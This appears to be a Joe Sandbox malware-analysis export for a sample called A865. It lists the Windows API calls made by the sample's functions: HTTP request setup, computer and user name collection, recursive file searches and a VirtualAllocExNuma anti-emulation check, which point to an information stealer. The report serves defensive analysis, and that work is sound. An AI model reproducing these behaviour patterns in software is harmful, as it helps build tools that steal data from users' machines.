                                                            • API String ID: 941982115-0
                                                            • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                            • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                            • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                            • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087AEB0), ref: 00406303
                                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A830,00000000,00000000,00400100,00000000), ref: 00406385
                                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                            • String ID: ERROR$ERROR
                                                            • API String ID: 3287882509-2579291623
                                                            • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                            • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                            • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                            • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocComputerNameProcess
                                                            • String ID:
                                                            • API String ID: 4203777966-0
                                                            • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                            • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                            • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                            • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                            • ExitProcess.KERNEL32 ref: 00401143
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                                            • String ID:
                                                            • API String ID: 1103761159-0
                                                            • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                            • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                            • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                            • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084A246
                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0084A266
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_849000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3833638111-0
                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction ID: 1c7311426dc1da6e75dcf2384b436366e3098b8b30e8c91ddc6371c7137325a9
                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                            • Instruction Fuzzy Hash: 0FF0F6361407297BD7203BF9988CB6FB2ECFF49724F100629E642D54C0CBB2EC455A62
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000400,?,?,022D0223,?,?), ref: 022D0E19
                                                            • SetErrorMode.KERNEL32(00000000,?,?,022D0223,?,?), ref: 022D0E1E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction ID: 50aa6c00ba5b177b5bbeec93bfda0059b8d1f6a57755c1eca6658fe1f3340d39
                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                            • Instruction Fuzzy Hash: FED0123115512877D7002AE4DC09BCD7B1CDF09B66F008011FB0DD9080C770964046E5
APIs
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
• VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
• Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
• Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
• Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
APIs
  • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
  • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
  • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
  • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
  • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
  • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
• ExitProcess.KERNEL32 ref: 004011C6
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Heap$Process$AllocName$ComputerExitUser
• String ID:
• API String ID: 1004333139-0
• Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
• Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
• Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
• Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00849F2E
Memory Dump Source
• Source File: 00000002.00000002.3069360956.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_849000_A865.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: f16c706fcd213dc5d313eb480a28e9fcd5bd72fab859ae2d2566c9293fbe6fe0
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 53112B79A00208EFDB01DF98C985E99BBF5EF08350F058094F9489B362D771EE90DB81
APIs
• wsprintfA.USER32 ref: 004138CC
• FindFirstFileA.KERNEL32(?,?), ref: 004138E3
• lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
• StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
• StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
• FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
• FindClose.KERNEL32(000000FF), ref: 00413C7C
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextlstrcatwsprintf
• String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
• API String ID: 1125553467-817767981
• Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
• Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
• Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
• Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
APIs
• wsprintfA.USER32 ref: 0041492C
• FindFirstFileA.KERNEL32(?,?), ref: 00414943
• StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
• StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
• FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
• FindClose.KERNEL32(000000FF), ref: 00414B92
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 180737720-445461498
• Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
• Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
• Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
• Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
APIs
• wsprintfA.USER32 ref: 022E3B33
• FindFirstFileA.KERNEL32(?,?), ref: 022E3B4A
• lstrcat.KERNEL32(?,?), ref: 022E3B9C
• StrCmpCA.SHLWAPI(?,00420F70), ref: 022E3BAE
• StrCmpCA.SHLWAPI(?,00420F74), ref: 022E3BC4
• FindNextFileA.KERNEL32(000000FF,?), ref: 022E3ECE
• FindClose.KERNEL32(000000FF), ref: 022E3EE3
Memory Dump Source
• Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextlstrcatwsprintf
• String ID:
• API String ID: 1125553467-0
• Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
• Instruction ID: a8a3bb34af7e2500e80b847235b5e56733963ffb6ca62fefeb3cc3aa77d66708
• Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
• Instruction Fuzzy Hash: 9FA15EB5A50218ABDF24EFA4CC84FFE737AAF49301F444588A50E96144DB759B84CF62
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
• HeapAlloc.KERNEL32(00000000), ref: 00414587
• wsprintfA.USER32 ref: 004145A6
• FindFirstFileA.KERNEL32(?,?), ref: 004145BD
• StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
• StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
• FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
• FindClose.KERNEL32(000000FF), ref: 004146A0
• lstrcatA.KERNEL32(?,00876020,?,00000104), ref: 004146C5
• lstrcatA.KERNEL32(?,00879A78), ref: 004146D8
• lstrlenA.KERNEL32(?), ref: 004146E5
• lstrlenA.KERNEL32(?), ref: 004146F6
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
• String ID: %s\%s$%s\*
• API String ID: 13328894-2848263008
• Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
• Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
• Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
• Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
APIs
• wsprintfA.USER32 ref: 022E4B93
• FindFirstFileA.KERNEL32(?,?), ref: 022E4BAA
• StrCmpCA.SHLWAPI(?,00420FDC), ref: 022E4BD8
• StrCmpCA.SHLWAPI(?,00420FE0), ref: 022E4BEE
• FindNextFileA.KERNEL32(000000FF,?), ref: 022E4DE4
• FindClose.KERNEL32(000000FF), ref: 022E4DF9
Memory Dump Source
• Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID:
• API String ID: 180737720-0
• Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
• Instruction ID: 838f3d4b9aca469d24645bc8798263f46c75174758c5e8897a35c85a1cb03794
• Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
• Instruction Fuzzy Hash: 0E6174B5950218ABDF20EFE0DD48FEA73BDFB49300F44858CA60A92144EB75A785CF91
APIs
• wsprintfA.USER32 ref: 00413EC3
• FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
• FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
• FindClose.KERNEL32(000000FF), ref: 00414081
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\%s
• API String ID: 180737720-4073750446
• Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
• Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
• Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
• Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
APIs
• GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
• RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
• wsprintfA.USER32 ref: 022E480D
• FindFirstFileA.KERNEL32(?,?), ref: 022E4824
• StrCmpCA.SHLWAPI(?,00420FC4), ref: 022E4852
• StrCmpCA.SHLWAPI(?,00420FC8), ref: 022E4868
• FindNextFileA.KERNEL32(000000FF,?), ref: 022E48F2
• FindClose.KERNEL32(000000FF), ref: 022E4907
• lstrcat.KERNEL32(?,0064A524), ref: 022E492C
• lstrcat.KERNEL32(?,0064A22C), ref: 022E493F
• lstrlen.KERNEL32(?), ref: 022E494C
• lstrlen.KERNEL32(?), ref: 022E495D
Memory Dump Source
• Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
Similarity
• API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
• String ID:
• API String ID: 671575355-0
• Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
• Instruction ID: f81b566ba7c6c0ce209fa75edb4fb1f2668fc2caa8d57bb3833e0d5d236d5231
• Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
• Instruction Fuzzy Hash: 415164B5590218ABDB24EBF0DD88FED737DAB58300F804588E64A96194EB749B84CF91
APIs
• wsprintfA.USER32 ref: 022E412A
• FindFirstFileA.KERNEL32(?,?), ref: 022E4141
• StrCmpCA.SHLWAPI(?,00420FAC), ref: 022E416F
• StrCmpCA.SHLWAPI(?,00420FB0), ref: 022E4185
• FindNextFileA.KERNEL32(000000FF,?), ref: 022E42D3
• FindClose.KERNEL32(000000FF), ref: 022E42E8
Memory Dump Source
• Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID:
• API String ID: 180737720-0
• Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
• Instruction ID: 78c0d789e220c9b51374007d8883cbcc2a84244c651a21ddc6774845ccc9e87f
• Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
• Instruction Fuzzy Hash: 265160B6910218ABCF24FBF0DD84EEA737DBB58300F40858CA64A96054EB759B85CF95
APIs
• wsprintfA.USER32 ref: 0040ED3E
• FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
• StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
• StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
• FindClose.KERNEL32(000000FF), ref: 0040F2C3
Memory Dump Source
• Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_A865.jbxd
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\*.*
• API String ID: 180737720-1013718255
• Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
• Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
• Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
• Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                            • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                            • String ID: 4@$\*.*
                                                            • API String ID: 2325840235-1993203227
                                                            • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                            • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                            • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                            • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
